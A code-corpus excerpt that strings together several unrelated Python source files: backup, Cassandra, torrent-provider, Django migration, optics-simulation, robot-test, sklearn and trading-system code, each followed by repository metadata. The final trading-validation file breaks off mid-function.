backup_dir = tmpdir.mkdir('another_fake_backup_id')
pgdata_dir = backup_dir.mkdir('pgdata')
info_file = backup_dir.join('backup.info')
info_file.write(BASE_BACKUP_INFO)
b_info = BackupInfo(server, backup_id="another_fake_backup_id")
# Check that the paths are built according with version
assert b_info.backup_version == 1
assert b_info.get_data_directory(16384) == \
backup_dir.strpath + '/pgdata/pg_tblspc/16384'
assert b_info.get_data_directory() == pgdata_dir.strpath
# Check that an exception is raised if an invalid oid
# is provided to the method
with pytest.raises(ValueError):
b_info.get_data_directory(12345)
# Check that a ValueError exception is raised with an
# invalid oid when the tablespaces list is None
b_info.tablespaces = None
# and expect a value error
with pytest.raises(ValueError):
b_info.get_data_directory(16384)
def test_to_json(self, tmpdir):
server = build_mocked_server(
main_conf={
'basebackups_directory': tmpdir.strpath
},
)
# Build a fake backup
backup_dir = tmpdir.mkdir('fake_backup_id')
info_file = backup_dir.join('backup.info')
info_file.write(BASE_BACKUP_INFO)
b_info = BackupInfo(server, backup_id="fake_backup_id")
# This call should not raise
assert json.dumps(b_info.to_json())
def test_from_json(self, tmpdir):
server = build_mocked_server(
main_conf={
'basebackups_directory': tmpdir.strpath
},
)
# Build a fake backup
backup_dir = tmpdir.mkdir('fake_backup_id')
info_file = backup_dir.join('backup.info')
info_file.write(BASE_BACKUP_INFO)
b_info = BackupInfo(server, backup_id="fake_backup_id")
# Build another BackupInfo from the json dump
new_binfo = BackupInfo.from_json(server, b_info.to_json())
assert b_info.to_dict() == new_binfo.to_dict()
| hareevs/pgbarman | tests/test_infofile.py | Python | gpl-3.0 | 19,981 |
from __future__ import absolute_import
import json
import logging
from uuid import uuid4
from dateutil.parser import parse
from cassandra.cqlengine import columns, models
# from scrapi import events
# from scrapi import database # noqa
# from scrapi.util import copy_to_unicode
# from scrapi.processing.base import BaseProcessor
# logger = logging.getLogger(__name__)
# logging.getLogger('cqlengine.cql').setLevel(logging.WARN)
#
#
# class CassandraProcessor(BaseProcessor):
# '''
# Cassandra processor for scrapi. Handles versioning and storing documents in Cassandra
# '''
# NAME = 'cassandra'
#
# @events.logged(events.PROCESSING, 'normalized.cassandra')
# def process_normalized(self, raw_doc, normalized):
# self.send_to_database(
# source=copy_to_unicode(raw_doc['source']),
# docID=copy_to_unicode(raw_doc['docID']),
# contributors=copy_to_unicode(json.dumps(normalized['contributors'])),
# description=copy_to_unicode(normalized.get('description')),
# uris=copy_to_unicode(json.dumps(normalized['uris'])),
# providerUpdatedDateTime=parse(normalized['providerUpdatedDateTime']),
# freeToRead=copy_to_unicode(json.dumps(normalized.get('freeToRead', {}))),
# languages=normalized.get('language'),
# licenses=copy_to_unicode(json.dumps(normalized.get('licenseRef', []))),
# publisher=copy_to_unicode(json.dumps(normalized.get('publisher', {}))),
# sponsorships=copy_to_unicode(json.dumps(normalized.get('sponsorship', []))),
# title=copy_to_unicode(normalized['title']),
# version=copy_to_unicode(json.dumps(normalized.get('version'), {})),
# otherProperties=copy_to_unicode(json.dumps(normalized.get('otherProperties', {}))),
# shareProperties=copy_to_unicode(json.dumps(normalized['shareProperties']))
# ).save()
#
# @events.logged(events.PROCESSING, 'raw.cassandra')
# def process_raw(self, raw_doc):
# self.send_to_database(**raw_doc.attributes).save()
#
# def send_to_database(self, docID, source, **kwargs):
# documents = DocumentModel.objects(docID=docID, source=source)
# if documents:
# document = documents[0]
# if self.different(dict(document), dict(docID=docID, source=source, **kwargs)):
# # Create new version, get UUID of new version, update
# versions = document.versions + kwargs.pop('versions', [])
# version = VersionModel(key=uuid4(), **dict(document))
# version.save()
# versions.append(version.key)
# return document.update(versions=versions, **kwargs)
# else:
# raise events.Skip("No changees detected for document with ID {0} and source {1}.".format(docID, source))
# else:
# # create document
# return DocumentModel.create(docID=docID, source=source, **kwargs)
#
# def different(self, old, new):
# try:
# return not all([new[key] == old[key] or (not new[key] and not old[key]) for key in new.keys() if key != 'timestamps'])
# except Exception:
# return True # If the document fails to load/compare for some reason, accept a new version
#
#
# @database.register_model
class DocumentModel(models.Model):
'''
Defines the schema for a metadata document in cassandra
The schema contains denormalized raw document, denormalized
normalized (so sorry for the terminology clash) document, and
a list of version IDs that refer to previous versions of this
metadata.
'''
__table_name__ = 'documents'
# Raw
docID = columns.Text(primary_key=True)
source = columns.Text(primary_key=True, clustering_order="DESC")
doc = columns.Bytes()
filetype = columns.Text()
timestamps = columns.Map(columns.Text, columns.Text)
# Normalized
uris = columns.Text()
title = columns.Text()
contributors = columns.Text() # TODO
providerUpdatedDateTime = columns.DateTime()
description = columns.Text()
freeToRead = columns.Text() # TODO
languages = columns.List(columns.Text())
licenses = columns.Text() # TODO
publisher = columns.Text() # TODO
subjects = columns.List(columns.Text())
tags = columns.List(columns.Text())
sponsorships = columns.Text() # TODO
version = columns.Text() # TODO
otherProperties = columns.Text() # TODO
shareProperties = columns.Text() # TODO
# Additional metadata
versions = columns.List(columns.UUID)
#
# @database.register_model
# class VersionModel(models.Model):
# '''
# Defines the schema for a version of a metadata document in Cassandra
#
# See the DocumentModel class. This schema is very similar, except it is
# keyed on a UUID that is generated by us, rather than it's own metadata
# '''
#
# __table_name__ = 'versions'
#
# key = columns.UUID(primary_key=True, required=True)
#
# # Raw
# doc = columns.Bytes()
# docID = columns.Text()
# filetype = columns.Text()
# source = columns.Text()
# timestamps = columns.Map(columns.Text, columns.Text)
#
# # Normalized
# uris = columns.Text()
# title = columns.Text()
# contributors = columns.Text() # TODO
# providerUpdatedDateTime = columns.DateTime()
#
# description = columns.Text()
# freeToRead = columns.Text() # TODO
# languages = columns.List(columns.Text())
# licenses = columns.Text() # TODO
# publisher = columns.Text() # TODO
# subjects = columns.List(columns.Text())
# tags = columns.List(columns.Text())
# sponsorships = columns.Text() # TODO
# version = columns.Text() # TODO
# otherProperties = columns.Text() # TODO
# shareProperties = columns.Text() # TODO
#
# # Additional metadata
# versions = columns.List(columns.UUID)
| kmjungersen/BenchmarkDB | BenchmarkDB/cassandradb/utils/_cassandra.py | Python | mit | 5,980 |
import re
from urllib.parse import urljoin
from sickchill import logger
from sickchill.helper.common import try_int
from sickchill.oldbeard import tvcache
from sickchill.oldbeard.bs4_parser import BS4Parser
from sickchill.providers.torrent.TorrentProvider import TorrentProvider
class Provider(TorrentProvider):
def __init__(self):
super().__init__("HorribleSubs")
self.public = True
self.supports_absolute_numbering = True
self.anime_only = True
self.minseed = 0
self.minleech = 0
self.url = 'https://horriblesubs.info'
self.urls = {
'search': urljoin(self.url, 'api.php'),
'rss': 'http://www.horriblesubs.info/rss.php'
}
self.cache = tvcache.TVCache(self, min_time=15) # only poll HorribleSubs every 15 minutes max
def search(self, search_strings, age=0, ep_obj=None):
results = []
if self.show and not self.show.is_anime:
return results
for mode in search_strings:
items = []
logger.debug(_("Search Mode: {mode}".format(mode=mode)))
for search_string in {*search_strings[mode]}:
if mode == 'RSS':
entries = self.__rssFeed()
else:
entries = self.__getShow(search_string)
items.extend(entries)
# For each search mode sort all the items by seeders if available
items.sort(key=lambda d: try_int(d.get('seeders', 0)), reverse=True)
results.extend(items)
return results
def __rssFeed(self):
entries = []
rss_params = {
'res': 'all'
}
target_url = self.urls['rss']
data = self.get_url(target_url, params=rss_params, returns='text')
if not data:
return entries
entries = self.__parseRssFeed(data)
return entries
@staticmethod
def __parseRssFeed(data):
entries = []
with BS4Parser(data, 'html5lib') as soup:
items = soup.findAll('item')
for item in items:
title = item.find('title').text
download_url = item.find('link').text
entry = {'title': title, 'link': download_url, 'size': 333, 'seeders': 1, 'leechers': 1, 'hash': ''}
logger.debug(_('Found result: {title}'.format(title=title)))
entries.append(entry)
return entries
def __getShow(self, search_string):
entries = []
search_params = {
'method': 'search',
'value': search_string
}
logger.debug(_("Search String: {search_string}".format(search_string=search_string)))
target_url = self.urls['search']
data = self.get_url(target_url, params=search_params, returns='text')
if not data:
return entries
entries = self.__parseSearchResult(data, target_url)
return entries
def __parseSearchResult(self, data, target_url):
results = []
with BS4Parser(data, 'html5lib') as soup:
lists = soup.find_all('ul')
list_items = []
for ul_list in lists:
curr_list_item = ul_list('li') if ul_list else []
list_items.extend(curr_list_item)
# Continue only if one Release is found
if len(list_items) < 1:
logger.debug('Data returned from provider does not contain any torrents')
return []
for list_item in list_items:
title = '{0}{1}'.format(str(list_item.find('span').next_sibling), str(list_item.find('strong').text))
logger.debug('Found title {0}'.format(title))
episode_url = '/#'.join(list_item.find('a')['href'].rsplit('#', 1))
episode = episode_url.split('#', 1)[1]
page_url = '{0}{1}'.format(self.url, episode_url)
show_id = self.__getShowId(page_url)
if not show_id:
logger.debug('Could not find show ID')
continue
fetch_params = {
'method': 'getshows',
'type': 'show',
'mode': 'filter',
'showid': show_id,
'value': episode
}
entries = self.__fetchUrls(target_url, fetch_params, title)
results.extend(entries)
return results
def __getShowId(self, target_url):
data = self.get_url(target_url, returns='text')
if not data:
logger.debug('Could not fetch url: {0}'.format(target_url))
return None
with BS4Parser(data, 'html5lib') as soup:
show_id = re.sub(r'[^0-9]', '', soup(text=re.compile('hs_showid'))[0])
logger.debug('show id: {0}'.format(show_id))
return show_id
def __fetchUrls(self, target_url, params, title):
entries = []
data = self.get_url(target_url, params=params, returns='text')
if not data:
return entries
with BS4Parser(data, 'html5lib') as soup:
for div in soup.findAll('div', attrs={'class': 'rls-link'}):
quality = div.find('span', attrs={'class': 'rls-link-label'}).get_text(strip=True)
link = div.find('span', class_='hs-torrent-link')
download_url = link.find('a')['href'] if link and link.find('a') else None
if not download_url:
# fallback to magnet link
link = div.find('span', class_='hs-magnet-link')
download_url = link.find('a')['href'] if link and link.find('a') else None
release_title = '[HorribleSubs] {0}.[{1}]'.format(title, quality)
item = {'title': release_title, 'link': download_url, 'size': 333, 'seeders': 1, 'leechers': 1, 'hash': ''}
logger.debug(_('Found result: ') + f'{release_title}')
entries.append(item)
return entries
| Vagab0nd/SiCKRAGE | sickchill/oldbeard/providers/horriblesubs.py | Python | gpl-3.0 | 6,132 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('artbot_website', '0002_auto_20160109_0625'),
]
operations = [
migrations.AddField(
model_name='event',
name='titleRaw',
field=models.TextField(null=True, blank=True),
),
migrations.AlterField(
model_name='event',
name='url',
field=models.TextField(),
),
migrations.RunSQL(
"UPDATE artbot_website_event SET titleRaw = title;"
),
migrations.AlterUniqueTogether(
name='event',
unique_together=set([('venue', 'titleRaw')]),
),
migrations.AlterField(
model_name='event',
name='titleRaw',
field=models.TextField(),
),
]
| coreymcdermott/artbot | artbot_website/migrations/0003_auto_20160222_0746.py | Python | mit | 930 |
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sahara import conductor as c
conductor = c.API
def get_raw_data(context, job_binary):
# url example: 'internal-db://JobBinaryInternal-UUID'
binary_internal_id = job_binary.url[len("internal-db://"):]
return conductor.job_binary_internal_get_raw_data(context,
binary_internal_id)
| openstack/sahara | sahara/service/edp/binary_retrievers/sahara_db.py | Python | apache-2.0 | 937 |
import numpy as np
import dipsim.util as util
class Illuminator:
"""An Illuminator is specified by its illumination type (wide, sheet),
optical axis, numerical aperture, index of refraction of the sample, and
polarization.
"""
def __init__(self, illum_type='wide', theta_optical_axis=0, na=0.8,
n=1.33, phi_pol=0):
self.illum_type = illum_type
self.theta_optical_axis = theta_optical_axis
self.na = na
self.n = n
self.alpha = np.arcsin(self.na/self.n)
self.phi_pol = phi_pol
def calc_excitation_efficiency(self, fluorophore):
theta = util.theta_prime(fluorophore.theta, fluorophore.phi, self.theta_optical_axis)
phi = util.phi_prime(fluorophore.theta, fluorophore.phi, self.theta_optical_axis)
A = (1.0/4.0) - (3.0/8.0)*np.cos(self.alpha) + (1.0/8.0)*(np.cos(self.alpha)**3)
B = (3.0/16.0)*np.cos(self.alpha) - (3.0/16.0)*(np.cos(self.alpha)**3)
C = (7.0/32.0) - (3.0/32.0)*np.cos(self.alpha) - (3.0/32.0)*(np.cos(self.alpha)**2) - (1.0/32.0)*(np.cos(self.alpha)**3)
D = 4.0/(3.0*(1.0 - np.cos(self.alpha)))
if self.illum_type == 'wide':
return D*(A + B*(np.sin(theta)**2) + C*(np.sin(theta)**2)*np.cos(2*(phi - self.phi_pol)))
elif self.illum_type == 'sheet':
return (np.sin(theta)*np.cos(phi - self.phi_pol))**2
elif self.illum_type == 'unpolarized':
return 2*D*(A + B*(np.sin(theta)**2))
else:
print("Warning: invalid illum_type")
| talonchandler/dipsim | dipsim/illuminator.py | Python | mit | 1,561 |
from __future__ import division
PKG='test_controller'
import unittest
from diff_drive.mock_robot import MockRobot
class TestMockRobot(unittest.TestCase):
def setUp(self):
self.robot = MockRobot()
def testNoMotion(self):
self.robot.updateRobot(1)
ticks = self.robot.getTicks()
self.assertEquals(ticks.left, 0)
self.assertEquals(ticks.right, 0)
self.robot.updateRobot(1)
ticks = self.robot.getTicks()
self.assertEquals(ticks.left, 0)
self.assertEquals(ticks.right, 0)
def testStraightLine(self):
self.robot.setSpeeds(100, 100)
self.robot.updateRobot(1)
ticks = self.robot.getTicks()
self.assertEquals(ticks.left, 0)
self.assertEquals(ticks.right, 0)
self.robot.updateRobot(1)
ticks = self.robot.getTicks()
self.assertEquals(ticks.left, 100)
self.assertEquals(ticks.right, 100)
self.robot.updateRobot(0.1)
ticks = self.robot.getTicks()
self.assertEquals(ticks.left, 110)
self.assertEquals(ticks.right, 110)
def testRotateLeft(self):
self.robot.setSpeeds(-100, 100)
self.robot.updateRobot(0.1)
self.robot.updateRobot(0.1)
ticks = self.robot.getTicks()
self.assertEquals(ticks.left, -10)
self.assertEquals(ticks.right, 10)
self.robot.updateRobot(0.1)
ticks = self.robot.getTicks()
self.assertEquals(ticks.left, -20)
self.assertEquals(ticks.right, 20)
if __name__ == '__main__':
unittest.main()
| merose/diff_drive | tests/test_mock_robot.py | Python | bsd-3-clause | 1,587 |
from sklearn import datasets, svm
digits = datasets.load_digits()
X_digits = digits.data
y_digits = digits.target
svc = svm.SVC(C=1, kernel='linear')
score = svc.fit(X_digits[:-100], y_digits[:-100]).score(X_digits[-100:], y_digits[-100:])
print(score)
# split the data in folds that we use for training and testing
# KFold cross validation
import numpy as np
X_folds = np.array_split(X_digits, 3)
y_folds = np.array_split(y_digits, 3)
scores = list()
for k in range(3):
X_train = list(X_folds)
# pop out the element with index k.
X_test = X_train.pop(k)
X_train = np.concatenate(X_train)
y_train = list(y_folds)
y_test = y_train.pop(k)
y_train = np.concatenate(y_train)
socres.append(svc.fit(X_train, y_train).score(X_test, y_test))
print(scores) | Og192/Python | sklearnLearning/modelSelection/scoreAndCress-validated.py | Python | gpl-2.0 | 785 |
# -*- coding: utf-8 -*-
# Copyright 2013 University of Oslo, Norway
#
# This file is part of Cerebrum.
#
# Cerebrum is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Cerebrum is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Cerebrum; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
from Cerebrum.modules.bofhd.bofhd_core_help import group_help
from Cerebrum.modules.bofhd.bofhd_core_help import command_help
from Cerebrum.modules.bofhd.bofhd_core_help import arg_help
command_help['group']['group_user'] = 'List all groups an account is a member of'
| unioslo/cerebrum | Cerebrum/modules/no/Indigo/bofhd_go_help.py | Python | gpl-2.0 | 1,063 |
import ael
import acm
import stat
import time
import shutil
import string
import HTI_functions
import HTI_DB_Functions
import datetime
from datetime import date
future_month_code_array = ['F','G','H','J','K','M','N','Q','U','V','X','Z']
call_month_code_array = ['A','B','C','D','E','F','G','H','I','J','K','L']
put_month_code_array = ['M','N','O','P','Q','R','S','T','U','V','W','X']
LEN_COMDY_CODE = 3
dsn = "HTIConnString"
def getYear(insType, insMaturity):
exp_day = ael.date(insMaturity).to_string("%Y%m%d")
return exp_day[2:4]
def getMonthCode(insType, call_option, insMaturity):
exp_day = ael.date(insMaturity).to_string("%Y%m%d")
mm = exp_day[4:6]
if insType == 'Future/Forward':
return future_month_code_array[int(mm)-1]
elif insType == 'Option':
if call_option == True:
return call_month_code_array[int(mm)-1]
else:
return put_month_code_array[int(mm)-1]
return ''
def getChildPortfolio(pPf, pfarr):
if (pPf == None):
return pfarr
for child in pPf.children():
pfid = child.display_id()
cPf = ael.Portfolio[pfid]
if cPf != None:
if cPf.compound == True:
pfarr = getChildPortfolio(cPf, pfarr)
else:
pfarr.append(pfid)
return pfarr
def addDictError(type, header, body, errdict):
invalidInsArray = errdict['invalidIns']
invalidCptyArray = errdict['invalidParty']
invalidPfArray = errdict['invalidPf']
invalidTrdCcyArray = errdict['invalidTrdCcy']
invalidAcqArray = errdict['invalidAcquirer']
invalidBrokerArray = errdict['invalidBroker']
invalidBuySellArray = errdict['invalidBuySell']
invalidTraderArray = errdict['invalidTrader']
print 'header=%s' % header
if type == 'Instrument':
i = 0
while i <= len(invalidInsArray[0])-1:
if len(invalidInsArray[0]) == 0:
invalidInsArray[0].append(header)
invalidInsArray[1].append(body)
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
else:
if invalidInsArray[0][i] == header:
orgtrd = invalidInsArray[1][i]
orgtrd = invalidInsArray[1][i]
orgtrd = orgtrd + '|' + body
invalidInsArray[1][i] = orgtrd
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
else:
i = i + 1
invalidInsArray[0].append(header)
invalidInsArray[1].append(body)
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
elif type == 'Portfolio':
i = 0
while i <= len(invalidPfArray[0])-1:
if len(invalidPfArray[0]) == 0:
invalidPfArray[0].append(header)
invalidPfArray[1].append(body)
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
else:
if invalidPfArray[0][i] == header:
orgtrd = invalidPfArray[1][i]
orgtrd = invalidPfArray[1][i]
orgtrd = orgtrd + '|' + body
invalidPfArray[1][i] = orgtrd
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
else:
i = i + 1
invalidPfArray[0].append(header)
invalidPfArray[1].append(body)
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
elif type == 'Counterparty':
i = 0
while i <= len(invalidCptyArray[0])-1:
if len(invalidCptyArray[0]) == 0:
invalidCptyArray[0].append(header)
invalidCptyArray[1].append(body)
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
else:
if invalidCptyArray[0][i] == header:
orgpty = invalidCptyArray[1][i]
orgpty = invalidCptyArray[1][i]
orgpty = orgpty + '|' + body
invalidCptyArray[1][i] = orgpty
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
else:
i = i + 1
invalidCptyArray[0].append(header)
invalidCptyArray[1].append(body)
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
elif type == 'Trade Ccy':
i = 0
while i <= len(invalidTrdCcyArray[0])-1:
if len(invalidTrdCcyArray[0]) == 0:
invalidTrdCcyArray[0].append(header)
invalidTrdCcyArray[1].append(body)
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
else:
if invalidTrdCcyArray[0][i] == header:
orgtrdccy = invalidTrdCcyArray[1][i]
orgtrdccy = invalidTrdCcyArray[1][i]
orgtrdccy = orgtrdccy + '|' + body
invalidTrdCcyArray[1][i] = orgtrdccy
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
else:
i = i + 1
invalidTrdCcyArray[0].append(header)
invalidTrdCcyArray[1].append(body)
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
elif type == 'Acquirer':
i = 0
while i <= len(invalidAcqArray[0])-1:
if len(invalidAcqArray[0]) == 0:
invalidAcqArray[0].append(header)
invalidAcqArray[1].append(body)
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
else:
if invalidAcqArray[0][i] == header:
orgacq = invalidAcqArray[1][i]
orgacq = invalidAcqArray[1][i]
orgacq = orgacq + '|' + body
invalidAcqArray[1][i] = orgacq
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
else:
i = i + 1
invalidAcqArray[0].append(header)
invalidAcqArray[1].append(body)
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
elif type == 'Broker':
i = 0
while i <= len(invalidBrokerArray[0])-1:
if len(invalidBrokerArray[0]) == 0:
invalidBrokerArray[0].append(header)
invalidBrokerArray[1].append(body)
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
else:
if invalidBrokerArray[0][i] == header:
orgbkr = invalidBrokerArray[1][i]
orgbkr = invalidBrokerArray[1][i]
orgbkr = orgbkr + '|' + body
invalidBrokerArray[1][i] = orgbkr
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
else:
i = i + 1
invalidBrokerArray[0].append(header)
invalidBrokerArray[1].append(body)
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
elif type == 'BuySell':
i = 0
while i <= len(invalidBuySellArray[0])-1:
if len(invalidBuySellArray[0]) == 0:
invalidBuySellArray[0].append(header)
invalidBuySellArray[1].append(body)
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
else:
if invalidBuySellArray[0][i] == header:
orgbs = invalidBuySellArray[1][i]
orgbs = invalidBuySellArray[1][i]
orgbs = orgbs + '|' + body
invalidBuySellArray[1][i] = orgbs
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
else:
i = i + 1
invalidBuySellArray[0].append(header)
invalidBuySellArray[1].append(body)
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
elif type == 'Trader':
i = 0
while i <= len(invalidTraderArray[0])-1:
if len(invalidTraderArray[0]) == 0:
invalidTraderArray[0].append(header)
invalidTraderArray[1].append(body)
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
else:
if invalidTraderArray[0][i] == header:
orgbs = invalidTraderArray[1][i]
orgbs = invalidTraderArray[1][i]
orgbs = orgbs + '|' + body
invalidTraderArray[1][i] = orgbs
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
else:
i = i + 1
invalidTraderArray[0].append(header)
invalidTraderArray[1].append(body)
errdict = {"invalidIns":invalidInsArray, "invalidParty":invalidCptyArray, "invalidPf":invalidPfArray, \
"invalidTrdCcy":invalidTrdCcyArray, "invalidAcquirer":invalidAcqArray, \
"invalidBroker":invalidBrokerArray, "invalidBuySell":invalidBuySellArray, \
"invalidTrader":invalidTraderArray}
return errdict
def validStatus(status):
if status.strip() in ('FO Confirmed', 'Simulated', ''):
return True
else:
return False
def get_dates():
dates = []
dates.append("TODAY")
dates.append(ael.date('2015-05-28'))
return dates
def ClearArray(arr):
i = 0
cnt = len(arr)
while i < cnt:
arr.pop()
i = i + 1
'''
def getAllBrokers():
parties = []
for pty in ael.Party.select("type = 'Broker'"):
parties.append(pty.display_id())
parties.sort()
return parties
def getAllPortfolios():
portfolios = []
for port in ael.Portfolio.select():
portfolios.append(port.display_id())
portfolios.sort()
return portfolios
def getAllParties():
parties = []
for pty in ael.Party.select("type = 'Client'"):
parties.append(pty.display_id())
for pty in ael.Party.select("type = 'Broker'"):
parties.append(pty.display_id())
for pty in ael.Party.select("type = 'Counterparty'"):
parties.append(pty.display_id())
parties.sort()
return parties
def getAllAcquirers():
acquirers = []
for acq in ael.Party.select("type = 'Intern Dept'"):
acquirers.append(acq.display_id())
acquirers.sort()
return acquirers
def getAllIssuers():
issuers = []
